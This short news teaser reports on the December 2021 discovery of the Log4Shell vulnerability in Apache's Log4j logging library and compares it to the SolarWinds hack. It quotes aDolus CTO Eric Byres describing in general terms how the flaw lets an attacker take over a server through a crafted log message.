Following on the December 2020 revelation of the Solar Winds software supply chain hack by Russian operatives, 2021 was not to be outdone, with December 2021 marking the discovery of Java developers' āown goalā on the global IT/OT infrastructure.
About a decade ago, contributors to release 2 of the Apache Foundationās open source Log4j software thought it would be a neat idea for the message/event logging software to be able to send a log that would also execute code, explains Eric Byres, CTO at aDolus (www.aDolus.com).
āEffectively, the Log4Shell vulnerability in the Log4j library provides a way to bundle a command into a message that looks like an event log, send it to your potential victimās log collector, then initiate a takeover,ā Byres explains. The Log4j vulnerability is of particular concern because its use is extremely widespread, the exploit is trivial, plus itās used in very high level, mission-critical servers. āItās Solar Winds without the Russians,ā Byres adds.
Read more on ControlGlobal.com.